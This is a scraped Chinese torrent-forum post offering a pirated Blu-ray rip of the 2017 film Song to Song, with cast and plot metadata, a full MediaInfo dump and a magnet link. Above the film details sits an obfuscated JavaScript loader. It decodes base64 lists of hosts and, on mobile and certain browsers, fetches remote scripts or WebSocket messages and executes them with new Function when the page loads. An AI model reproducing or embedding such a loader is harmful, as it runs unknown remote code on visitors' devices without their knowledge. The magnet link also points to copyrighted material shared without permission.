歌声不绝[双语字幕]Song.to.Song.2017.1080p.BluRay.x264.DTS-迅雷下载 12.69GB

版主小s 16天前 134

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 歌声不绝 / 歌至歌 / 为你唱的歌(台) / 失重 / 歌连歌 / 歌声不断 / 无法无天 / 非法 / Weightless / Lawless

◎片 名 Song to Song

◎年 代 2017

◎产 地 美国

◎类 别 剧情 / 音乐

◎语 言 英语

◎上映日期 2017-03-10(西南偏南电影节) / 2017-03-17(美国)

◎IMDb链接 https://www.imdb.com/title/tt2062700/

◎豆瓣评分 5.6/10 (6593人评价)

◎豆瓣链接 https://movie.douban.com/subject/6854414/

◎片 长 129分钟

◎导 演 泰伦斯·马力克 Terrence Malick (id:1036442)

◎编 剧 泰伦斯·马力克 Terrence Malick (id:1036442)

◎演 员 瑞恩·高斯林 Ryan Gosling (id:1012531)

鲁妮·玛拉 Rooney Mara (id:1274969)

迈克尔·法斯宾德 Michael Fassbender (id:1000010)

娜塔莉·波特曼 Natalie Portman (id:1054454)

凯特·布兰切特 Cate Blanchett (id:1054441)

霍利·亨特 Holly Hunter (id:1031838)

贝纳尼丝·玛尔洛 Bérénice Marlohe (id:1316250)

方·基默 Val Kilmer (id:1013761)

莉琦·李 Lykke Li (id:1274141)

奥利维亚·格雷斯·阿普尔盖特 Olivia Grace Applegate (id:1351978)

戴娜·福尔肯伯里 Dana Falconberry (id:1376250)

琳达·伊蒙 Linda Emond (id:1089156)

洛安娜·斯蒂芬斯 Louanne Stephens (id:1376251)

克里斯汀·索耶·戴维斯 Christin Sawyer Davis (id:1376252)

汤姆·斯图里奇 Tom Sturridge (id:1274492)

奥斯丁·阿梅里奥 Austin Amelio (id:1356340)

伊基·波普 Iggy Pop (id:1045097)

帕蒂·史密斯 Patti Smith (id:1014221)

约翰·莱顿 John Lydon (id:1005237)

弗洛伦丝·威尔奇 Florence Welch (id:1266130)

瓦内萨·阿玛雅 Vanessa Amaya (id:1348752)

崔凡特·罗兹 Trevante Rhodes (id:1340760)

理查德·迪拉德 Richard Dillard (id:1335198)

安吉拉·贝蒂斯 Angela Bettis (id:1013924)

希瑟·卡夫卡 Heather Kafka (id:1113205)

派纳普·坦加罗亚 Pineapple Tangaroa (id:1457334)

汤姆·劳 Tom Lowe (id:1336672)

艾曼努尔·卢贝兹基 Emmanuel Lubezki (id:1290417)

A.J. 爱德华兹 A.J. Edwards (id:1340734)

◎标 签 美国 / RyanGosling / 音乐 / RooneyMara / NataliePortman / 2017 / 美国电影 / 剧情

◎简 介

影片讲述一段性爱沉迷与背叛的故事,具体就是在德克萨斯州奥斯汀市的音乐节上,相互交叉的三角恋情。

◎获奖情况 (共1项)

第3届豆瓣电影年度榜单 (2016)

最值得期待的外语电影(提名)

  1. General

  2. Unique ID : 148774245723911101469759079212392752010 (0x6FECE0A27C437171ACC765068161A38A)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.7 GiB

  7. Duration : 2 h 8 min

  8. Overall bit rate : 14.1 Mb/s

  9. Encoded date : UTC 2021-07-14 09:39:54

  10. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 2 h 8 min

  22. Bit rate : 12.5 Mb/s

  23. Width : 1 920 pixels

  24. Height : 804 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.339

  33. Stream size : 11.3 GiB (89%)

  34. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4352 (0x1100)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 2 h 8 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 24 bits

  53. Compression mode : Lossy

  54. Stream size : 1.36 GiB (11%)

  55. Language : English

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4610 (0x1202)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 2 h 7 min

  67. Bit rate : 25.0 kb/s

  68. Count of elements : 2247

  69. Stream size : 22.7 MiB (0%)

  70. Title : chs&eng

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4611 (0x1203)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 2 h 7 min

  83. Bit rate : 25.1 kb/s

  84. Count of elements : 2247

  85. Stream size : 22.8 MiB (0%)

  86. Title : cht&eng

  87. Language : Chinese

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #3

  92. ID : 5

  93. ID in the original source medium : 4612 (0x1204)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 2 h 7 min

  99. Bit rate : 14.3 kb/s

  100. Count of elements : 2247

  101. Stream size : 13.0 MiB (0%)

  102. Title : chs

  103. Language : Chinese

  104. Default : No

  105. Forced : No

  106. Original source medium : Blu-ray


  107. Text #4

  108. ID : 6

  109. ID in the original source medium : 4613 (0x1205)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 2 h 7 min

  115. Bit rate : 14.4 kb/s

  116. Count of elements : 2247

  117. Stream size : 13.1 MiB (0%)

  118. Title : cht

  119. Language : Chinese

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Text #5

  124. ID : 7

  125. ID in the original source medium : 4608 (0x1200)

  126. Format : PGS

  127. Muxing mode : zlib

  128. Codec ID : S_HDMV/PGS

  129. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration : 2 h 7 min

  131. Bit rate : 32.5 kb/s

  132. Count of elements : 3101

  133. Stream size : 29.8 MiB (0%)

  134. Language : English

  135. Default : No

  136. Forced : No

  137. Original source medium : Blu-ray


  138. Menu

  139. 00:00:00.000 : 第 01 章

  140. 00:05:20.695 : 第 02 章

  141. 00:11:44.245 : 第 03 章

  142. 00:19:25.789 : 第 04 章

  143. 00:26:51.192 : 第 05 章

  144. 00:31:57.248 : 第 06 章

  145. 00:38:45.239 : 第 07 章

  146. 00:44:57.111 : 第 08 章

  147. 00:49:30.509 : 第 09 章

  148. 00:56:46.528 : 第 10 章

  149. 01:04:52.722 : 第 11 章

  150. 01:11:45.634 : 第 12 章

  151. 01:16:17.531 : 第 13 章

  152. 01:24:38.239 : 第 14 章

  153. 01:31:05.251 : 第 15 章

  154. 01:34:57.108 : 第 16 章

  155. 01:44:31.974 : 第 17 章

  156. 01:50:06.349 : 第 18 章

  157. 01:56:02.789 : 第 19 章

  158. 01:59:57.440 : 第 20 章


TAGS 剧情 音乐

磁力链:
  • magnet:?xt=urn:btih:D507DF7E8D38100BAC1601A7EAED94FB19859D84
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖